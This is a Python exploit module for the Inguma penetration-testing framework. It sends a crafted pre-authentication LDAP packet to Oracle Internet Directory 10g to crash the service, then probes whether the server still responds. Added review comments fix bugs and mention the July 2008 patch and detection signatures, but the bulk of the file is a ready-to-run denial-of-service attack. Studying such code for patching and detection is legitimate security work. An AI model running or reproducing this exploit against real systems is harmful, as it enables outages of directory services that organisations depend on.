#!/usr/bin/python

##      COraOidDos.py
#       
#       Copyright 2010 Joxean Koret <joxeankoret@yahoo.es>
#       
#       This program is free software; you can redistribute it and/or modify
#       it under the terms of the GNU General Public License as published by
#       the Free Software Foundation; either version 2 of the License, or
#       (at your option) any later version.
#       
#       This program is distributed in the hope that it will be useful,
#       but WITHOUT ANY WARRANTY; without even the implied warranty of
#       MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#       GNU General Public License for more details.
#       
#       You should have received a copy of the GNU General Public License
#       along with this program; if not, write to the Free Software
#       Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
#       MA 02110-1301, USA.

"""
Oracle OID 10.1.4 Remote Denial Of Service for Inguma
"""

import sys
import time
import socket

from lib.libexploit import CIngumaModule

# Module metadata. The visible code never reads these names itself; they are
# presumably picked up by the Inguma module loader -- confirm against
# lib.libexploit.
name = "oraoiddos"
# NOTE(review): this string pins the issue to 10.1.4, while `description`
# below says "any version" of 10g -- confirm the affected range against the
# vendor advisory before relying on either for asset triage.
brief_description = "Oracle OID 10.1.4 Remote DOS Preauth"
# NOTE(review): shadows the builtin type() for the rest of this module; the
# name looks like part of the module interface, so it is left as is.
type = "exploit"
affects = ["Oracle Internet Directory 10g"]
description = """
Oracle Internet Directory 10g (any version) under Win32 is vulnerable to a 
preauthentication remote denial of service condition.
"""
# Remediation reference: the fix is attributed to the July 2008 Oracle
# Critical Patch Update. Installations below that patch level are the ones
# to prioritise.
patch = "Fixed in CPUJul2008"
category = "dos"
discoverer = "Joxean Koret"
author = "Joxean Koret <joxeankoret@yahoo.es>"

# Probe sent by checkHealth() after the trigger packet.
# NOTE(review): every backslash is doubled, so this is the literal text
# "\x02\x01..." rather than the raw bytes; as written it is not a BER-encoded
# LDAP message. Presumably a pasted repr() -- confirm. Until it is corrected,
# a "server is up" verdict from the probe is not reliable evidence that the
# target is patched.
healthPacket = "0%\\x02\\x01\\x01c \\x04\\x00\\n\\x01\\x02\\n\\x01\\x00\\x02\\x01\\x00\\x02\\x01\\x00\\x01\\x01\\x00\\x87\\x0bobjectClass0\\x00"
# Fixed 16-byte request sent by oidDos() before any authentication.
# NOTE(review): the framing looks like an LDAP BindRequest (application tag
# 0x60) -- confirm against the advisory when writing a detection signature.
packet = "\x30\x0e\x02\x01\x01\x60\x09\x30\x01\x03\x04\x02\x44\x4e\x80\x00"

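class COraOidDos(CIngumaModule):
    """Inguma module for the Oracle Internet Directory pre-auth DoS check.

    ``run`` sends the module-level ``packet`` to the configured target and
    then calls ``checkHealth`` to see whether the listener still answers.
    The only outcome reported as success is a connection reset (errno 104)
    on the follow-up probe; every other outcome is reported as "up" or as
    inconclusive, so a negative result is weak evidence of a patched host.
    """

    # Target host and TCP port; run() falls back to localhost:389 when unset.
    target = ""
    port = 0
    # The attributes below are not referenced by any method of this class;
    # presumably they are read by CIngumaModule or the framework -- confirm.
    waitTime = 0
    timeout = 1
    exploitType = 1
    # NOTE(review): mutable class-level dicts are shared by every instance
    # unless the base class rebinds them per instance -- confirm.
    services = {}
    results = {}
    # Shadows the builtin name inside the class namespace only.
    dict = None
    interactive = False

    def checkHealth(self, hostname, port):
        """Probe hostname:port after the trigger packet and print a verdict.

        Waits five seconds, connects, sends ``healthPacket`` and reads up to
        1024 bytes. A connection reset (errno 104) is reported as success,
        any received data as "up", and everything else as inconclusive.
        Connection failures are not handled here and propagate to the caller.
        """
        print("  --> Wating 5 seconds")
        time.sleep(5)

        print("  --> Connecting to target...")
        # NOTE: this sets the process-wide default, so it also applies to
        # sockets created later by other code in the same interpreter.
        socket.setdefaulttimeout(5)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Bound up front so the verdict below never reads an unset name when
        # the exchange fails with something other than a reset.
        data = ""
        try:
            s.connect((hostname, port))

            try:
                print("  --> Sending 'health' packet ...")
                s.sendall(healthPacket)
                print("  --> Trying to receive something...")
                data = s.recv(1024)
            except socket.error:
                err = sys.exc_info()[1]

                # 104 is ECONNRESET on Linux; other platforms report a reset
                # with a different code, so such a reset ends up in the
                # inconclusive branch below. Timeouts carry a string in
                # args[0] and are therefore never mistaken for a reset.
                if err.args and err.args[0] == 104:
                    print("[+] Exploits works!")
                    return
        finally:
            # Release the descriptor on every path, including early return.
            s.close()

        if data != "":
            print("[!] Server is up and running :(")
        else:
            print("[?] Server doesn't answer nothing. It works?")

    def oidDos(self, hostname, port):
        """Send ``packet`` to hostname:port, then run the health probe.

        Errors are printed rather than raised, so ``run`` always completes.
        """
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            try:
                print("[+] Connecting to ldap://%s:%d..." % (hostname, port))
                s.connect((hostname, int(port)))

                print("[+] Sending packet...")
                s.sendall(packet)
            finally:
                # Close on the failure path as well as after a clean send.
                s.close()

            print("[+] Checking OID's health...")
            # checkHealth is a method; calling it as a bare name raised
            # NameError, which the handler below printed and swallowed, so
            # the probe never actually ran.
            self.checkHealth(hostname, port)
        except Exception:
            # Exception rather than a bare except, so Ctrl-C still interrupts.
            print(sys.exc_info()[1])

    def run(self):
        """Apply the localhost:389 defaults and run the check; returns True."""
        if self.target == "" or self.target is None:
            self.target = "localhost"

        if self.port == 0 or self.port is None:
            self.port = 389

        self.oidDos(self.target, self.port)

        return True

    def printSummary(self):
        """Called after run() when run() returns True; nothing to summarise."""
        pass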

